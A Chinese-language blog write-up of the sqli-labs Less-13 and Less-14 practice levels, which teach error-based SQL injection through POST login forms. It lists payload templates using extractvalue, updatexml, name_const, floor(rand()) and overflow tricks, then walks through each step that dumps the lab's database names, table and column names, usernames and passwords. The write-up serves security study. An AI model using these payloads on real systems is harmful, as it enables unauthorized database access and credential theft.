Sqli-labs 复习 Less13-14 报错型盲注 - POST

最新推荐文章于 2024-05-17 07:47:17 发布
最新推荐文章于 2024-05-17 07:47:17 发布
阅读量399 收藏 2
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81592485
版权

之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象

Sqli-labs 博客目录

报错型 SQL 盲注

函数讲解

  1. 盲注用到的函数

    rand()  产生一个不固定的0~1的随机数列,加了参数之后会变成固定的伪随机数列
rand(0),rand(1),当使用一个整数参数时,rand使用该参数作为种子生成一个固定的伪随机数列
floor  向下取整 floor(2.5) == 2
count()统计元组的个数
concat() 字符串连接 concat('~~','aaa','bbb',) =>'aaa~~bbb' 
concat_ws() 字符串连接 concat_ws('~~','aaa','bbb',) =>'aaa~~bbb'   
extractvalue(最长32位) MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML()
updateXml(最长32位)
name_const(): mysql存储过程中的本地变量会被一个内部函数 name_const 转化,似乎是专门为存储过程设计的,没有提到有其它特别之处.

    Less-13 使用 name_const() 报错注入
    Less-14 使用 extractvalue() 报错注入

注入方法

  1. 布尔型盲注手法,按位爆破

    1. left()
    2. ascii()、substr()
    3. regexp
    4. ord()、mid()

    ?id=1’and left((select version() limit 0,1),1)=’s’#

  2. 利用 floor(rand(x)*2) 的执行bug进行报错注入

    ?id=1” union select 1,count(*),concat((你希望的查询语句),floor(rand(0)*2))a from information_schema.columns group by a#

    ?id=1” and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#

  3. 利用 extractvalue() 函数报错注入(有长度限制,最长32位,mysql 5.0不可用,mysql 5.6可用)

    ?id=1” and extractvalue(1,concat(0x7e,(你希望的查询语句)))#

    ?id=1” and extractvalue(1,concat(0x7e,((select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a))))#

    ?id=1” and extractvalue(1,concat(0x7e,(database())))#

    ?id=1” and extractvalue(1,concat(0x7e,((select * from(select concat((select username from security.users limit 0,1))x from information_schema.tables group by x)a))))#

  4. 利用 updatexml() 函数报错注入(有长度限制,最长32位)

    ?id=1” and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#

  5. 利用 name_const 数据的重复性(低版本可用,mysql 5.0可用,mysql 5.6不可用 )

    ?id=1” union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #

    ?id=1” and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#

  6. 利用 double 数值类型超出范围进行报错注入

    ?id=1” union select (exp(~(select * from(select user())a))),2,3#

    未测试成功

  7. 利用 bigint 溢出进行报错注入(这些溢出错误会导致MySQL版本5.5.5及以上)

    基于 bigint 溢出错误的SQL注入( https://www.cnblogs.com/lcamry/articles/5509112.html)

    未测试成功

    ?id=1” union select (!(select * from (select user())x) - ~0),2,3#

    下面为句式:

    !(select*from(select user())x)-~0

    (select(!x-~0)from(select(select user())x)a)

    (select!x-~0.from(select(select user())x)a)

    select ~0+!(select*from(select user())x)

  8. 一个句式组合:

    (select * from(select concat((你希望的查询语句))x from information_schema.tables group by x)a)

    遇到无法使用 select * from * 查询的时候,可以使用这个万能句式,代替下面的“你希望的查询语句”

    ?id=1" and (select 1 from(select count(*),concat((你希望的查询语句),floor(rand(0)*2))x from information_schema.tables group by x)a)#

?id=1" and extractvalue(1,concat(0x7e,(你希望的查询语句)))#

?id=1" and updatexml(1,concat(0x7e,(你希望的查询语句),0x7e),1)#

?id=1" and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#

?id=1" union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #

?id=1" union select (exp(~(select * from(select user())a))),2,3#

and so on...

Less-13 报错型盲注-单引号括号

  1. 测试

    低版本可用,mysql 5.0可用,mysql 5.6不可用

    在 username 输入 1’) order by 2# //无显示

    在 password 输入 任意内容

    在 username 输入 1’) order by 3# //报错

    在 password 输入 任意内容

    ?id=1” union select 1,2,3 from (select name_const((你希望的查询语句),1),name_const((你希望的查询语句),1))x #

    ?id=1” and exists(select * from (select * from(select name_const((你希望的查询语句),0))a join(select name_const((你希望的查询语句),0))b)c)#

  2. 猜数据库

    1’) union select 1,2 from (select name_const((select version() limit 0,1)),1),name_const((select version() limit 0,1),1))x#

    1’) union select 1,2 from (select name_const((select table_schema from information_schema.tables limit 0,1),1),name_const((select table_schema from information_schema.tables limit 0,1),1))x #

    1’) and exists(select * from (select * from(select name_const((select table_schema from information_schema.tables limit 0,1),1))a join(select name_const((select table_schema from information_schema.tables limit 0,1),1))b)c)#

    结果显示 security

  3. 猜表名

    1’) union select 1,2,3 from (select name_const((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1),name_const((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1))x#

    1’) union select 1,2,3 from (select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’),1),name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’),1))x#

    1’) and exists(select * from (select * from(select name_const((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1))a join(select name_const((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1))b)c)#

    1’) and exists(select * from (select * from(select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’),1))a join(select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’),1))b)c)#

    结果显示 ‘emails ,referers ,uagents ,users

  4. 猜列名

    1’) union select 1,2,3 from (select name_const((select column_name from information_schema.columns where table_name=’users’ and table_schema=’security’ limit 0,1),1),name_const((select column_name from information_schema.columns where table_name=’users’ and table_schema=’security’ limit 0,1),1))x#

    1’) union select 1,2,3 from (select name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’),1),name_const((select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’),1))x#

    1’) and exists(select * from (select * from(select name_const((select group_concat(column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’),1))a join(select name_const((select group_concat(column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’),1))b)c)#

    1’) and exists(select * from (select * from(select name_const((select column_name from information_schema.columns where table_name=’users’ and table_schema=’security’ limit 0,1),1))a join(select name_const((select column_name from information_schema.columns where table_name=’users’ and table_schema=’security’ limit 0,1),1))b)c)#

    结果为 ‘id ,username ,password ‘

  5. 猜数据

    1’) union select 1,2,3 1’) union select 1,2,3 from (select name_const((select group_concat(username,0x20) from security.users),1),name_const((select group_concat(username,0x20) from security.users),1))x#

    1’) and exists(select * from (select * from(select name_const((select group_concat(password,0x20) from security.users),1))a join(select name_const((select group_concat(password,0x20) from security.users),1))b)c)#

    结果为 

    username:'Dumb ,Angelina ,Dummy ,secure ,stupid ,superman ,batman ,admin ,'
password: 'Dumb ,I-kill-you ,p@ssword ,crappy ,stupidity ,genious ,mobile ,'

Less-14 报错型盲注-双引号

  1. 测试

    有长度限制,最长32位,mysql 5.0不可用,mysql 5.6可用

    在 username 输入 1” order by 2#

    在 username 输入 1” order by 3#

    在 password 输入 任意

    1” and extractvalue(1,concat(0x7e,(你希望的查询语句)))#

  2. 猜数据库

    1” and extractvalue(1,concat(0x7e,(database())))#

    1” and extractvalue(1,concat(0x7e,(select table_schema from information_schema.tables limit 0,1)))#

    结果为 security

  3. 猜表名

    1” and extractvalue(1,concat(0x7e,(select group_concat(table_name,0x20) from information_schema.tables where table_schema=’security’)))#

    结果为 emails ,referers ,uagents ,user

  4. 猜列名

    1” and extractvalue(1,concat(0x7e,(select group_concat(column_name,0x20) from information_schema.columns where table_name=’users’ and table_schema=’security’)))#

    结果为 id ,username ,password

  5. 猜数据

    1” and extractvalue(1,concat(0x7e,(select group_concat(username) from security.users)))#

    1” and extractvalue(1,concat(0x7e,(select group_concat(password) from security.users)))#

    结果为(输出结果有长度限制)

    username:Dumb,Angelina,Dummy,secure,stup
password:Dumb,I-kill-you,p@ssword,crappy
网络安全打工人
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-less-13 post传参+布尔盲注
yzcn
11-12 300
Less-13 post+布尔盲注 首先通过burp suite抓包获取报文体: 利用harkbar插件进行注入: 判断闭合方式: uname=’)or 1=1 #&passwd=&submit=Submit 发现闭合方式为(‘’) uname=’))#&passwd=&submit=Submit 本关卡没有回显,只有正误判断和报错信息,我们可以使用布尔盲注、延时注入或者报错注入,这里我么使用报注入。 判断字段列数: uname=’) group by 3 #&
SQLi LABS Less 14 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十四关,SQLi-LABS Less-14SQLi-LABS Less 14SQLiLABS Less14SQLi Less 14
SQLi LABS Less-13 报错注入+布尔盲注_ sqli less-13 (1)
2401_84265909的博客
05-17 918
登录成功时,会提示成功(写死的图片);截取当前使用数据库名字的第一个字符,为了方便脚本的编写,这里将字符转换为ASCLL再判断。页面显示数据库的报错信息,从报错信息中判断出,注入点为:单引号+括号的字符注入。猜中第一个字符以后,再用此方法枚举其余字符,为了提高效率,稍后使用脚本自动化枚举。接下来使用穷举法,枚举该字符的所有可能性(对应的ASCLL码为:32~126)。从1开始递增测试的长度,可判断出具体的长度,稍后使用脚本自动化猜解。字符的ASCLL码肯定大于1,页面正常显示,表示payload可用。
SQLI-Labs(3)8-14关【布尔盲注和时间盲注
weixin_52515588的博客
03-05 427
利用payload:' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1【位数】,1【个数】)))=101--+那么时间盲注最大的问题就是我们没办法一开始就猜到闭合的规则,有可能试了半天他最后没有时间盲注,所以这里就考验的是心态。第十四关又是闭合的问题了。剩下的就跟之前是一样的了,在这里也不多说了,不知道的可以看之前的东西。
sqli-labs第十三和十四关(post请求-报错盲注)
qq_42266432的博客
08-24 641
一上来,先加个单引号探探路,有sql报错回显 在单引号后继续加上and 1,试图让sql报错显示更多信息,从near ‘’) and password=(‘1’) LIMIT 0,1’ at line 1可以判断,这关就用单引号加括号了,没什么意思 注入’)却发现,页面没有回显,于是这里考虑使用报错盲注或者布尔盲注,时间延时说不定也行,先采用报错盲注吧 先使用order by 拆解出字段数为2 爆出当前数据库 uname=uname=1') and 1 union select 1,updatex.
SQL | POST基于时间与布尔盲注
m_de_g的博客
12-06 1464
SQL | POST基于时间与布尔盲注 1.HTTP POST介绍 POST发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会指向资源提交数据,请求服务器进行处理,如:表单数据提交、文件上传等,请求数据会被包含在请求体中。 POST方法可能创建新的资源或修改现有资源。 使用POST方法时,查询字符串在POST信息中单独存在,和HTTP请求一起发送到服务器 2.POST基于时间的盲注 3.POST基于布尔盲注 4.sqlmap安全测试 ...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
修改过的sqli1-14
08-23
sqli1_14.tar.gz为修改过的sqli-labs-master前14课的内容。
Sqli-labs之Less-13和Less-14
→_→
04-05 1146
Less-13 POST单引号变形双注入 由题意可知,有单引号闭合的问题,所以在输入框中分别输入 1' 和 1,看返回结果: 报错,从信息中得知还有一个小括号,测试 1') or 1=1 -- # 登录成功发现不在返回用户名和密码信息。 从以上的信息中...
SQLi LABS Less-13 报错注入+布尔盲注
wangyuxiang946的博客
06-21 1万+
SQLi 第十三关,SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
SQL注入详解 11-22关
君莫hacker的博客
09-28 817
目录Less-11(POST传参,联合注入)Less-12(floor报错注入)Less-13(updatexml()报错注入)Less-14 Less-11(POST传参,联合注入) 第11关总结: 第十一关与前面的关卡不太相同,这里采用了POST传参,我们需要借助浏览器插件或者抓包工具对其参数进行修改。用户名与密码均为admin,登录成功后会回显出用户名及密码,所以我们可以尝试在参数uname与参数passwd处尝试进行注入,经过判断,发现在参数uname处存在单引号字符注入,并且有回显能判断出字段
mysql注入天书(一)Basic Challenges
eWFuZw==的博客
09-06 822
【独家连载】mysql注入天书(一)Basic Challenges lcamry / 2016-1...
一篇学会SQL注入 | 详解SQL注入(基础向,基础到每个参数)
weixin_47075747的博客
06-14 437
**括号里面的查询被称之为子查询,在执行顺序中子查询先执行,然后再执行外面的 select **2) 的值是确定性的,假随机。
sqli-labs/Less-13
m0_71299382的博客
11-18 276
sqli-labs第十三关
LESS-13
qq_44598397的博客
03-21 377
LESS-13 源码: 输入:admin’,出现错误提示,可以知道sql注入中是用’)闭合。 输入:admin’)# 因为这里有报错,所以可以用报错注入 admin’) and extractvalue(1,concat(0x7E,(select database()),0x7E))# 布尔注入: admin’) and left(database(),1)>‘a’#(可以用二分法进...
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值